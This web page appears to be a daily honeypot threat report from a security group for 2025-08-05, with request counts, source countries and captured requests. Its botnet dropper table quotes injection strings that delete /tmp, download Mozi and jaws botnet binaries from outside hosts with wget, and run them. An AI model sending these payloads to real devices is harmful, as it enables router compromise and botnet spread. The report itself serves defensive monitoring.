Skip to main content
  1. Daily-Posts/

Report: 2025-08-05

·338 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-08-05
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 6 stage 1 IP address(es), linked to 5 dropper URL(s).

There are 16 new requests that have never been observed before (these were added to the monitored request database.).

A total of 803 requests were recorded during the day, originating from 6 different countries, with a peak of 436 requests coming from GB.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
GBGermany
GBGermany
USGermany
USGermany
KRGermany
USGermany
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
103.207.224.51GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
117.216.70.2227;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
119.188.164.100GET /shell?cd+/tmp;rm+-rf+*;wget+196.251.86.86/jaws;sh+/tmp/jaws HTTP/1.1
117.196.4.127;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
118.194.249.90GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
45.230.66.99GET /shell?cd+/tmp;rm+-rf+*;wget+http://45.230.66.99:10652/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
712GET http://httpbin.org/anything/test HTTP/1.1
742GET http://checkip.amazonaws.com/ HTTP/1.1
752GET http://httpbin.org/uuid HTTP/1.1
2241\x00\x0E8\xBA\xBB\xB8\xF3L\xA6\xAB-\x00\x00\x00\x00\x00
2251\x10\x12\x00\x04MQTT\x04\x00\x00
2261\x00\x0E\x08\xFCT \x8E\x08\xB4\x0Ft\x00\x00\x00\x00\x00
2271\x00\x0E8\xFCT \x8E\x08\xB4\x0Ft\x00\x00\x00\x00\x00
2281\x00\x0E\x08\xB3\xF4\xDA\xA5\x8Fd\x8B\xAA\x00\x00\x00\x00\x00
2291\x00\x0E8\xB3\xF4\xDA\xA5\x8Fd\x8B\xAA\x00\x00\x00\x00\x00
2421\x04\x01\x00P? \x88a\x00\x00
2571GET http://pascal.hoez.free.fr/azenv.php HTTP/1.1
2581CONNECT ident.me:443 HTTP/1.1
2591\x04\x01\x01\xBBAl\x97?\x00
2701\x00\x0E8\xF0\x82\xD69b\xD5*\xA3\x00\x00\x00\x00\x00
3231GET /goform/qpalfhyd HTTP/1.1
3321GET /http.txt HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0436GB
1146US
269NL
347DE
413SC
511JP
69PL
79CA
88LT
98SG
107KR
117BG
126RU
134ZA
143HK
153CN
163IN
172RO
182AU
192IR
201BE
211DK
221PA
231PT
241FR
251CH
261AR
271PH

Related

Report: 2025-08-04
·393 words
Repport Daily
Report: 2025-08-03
·355 words
Repport Daily
Report: 2025-08-02
·340 words
Repport Daily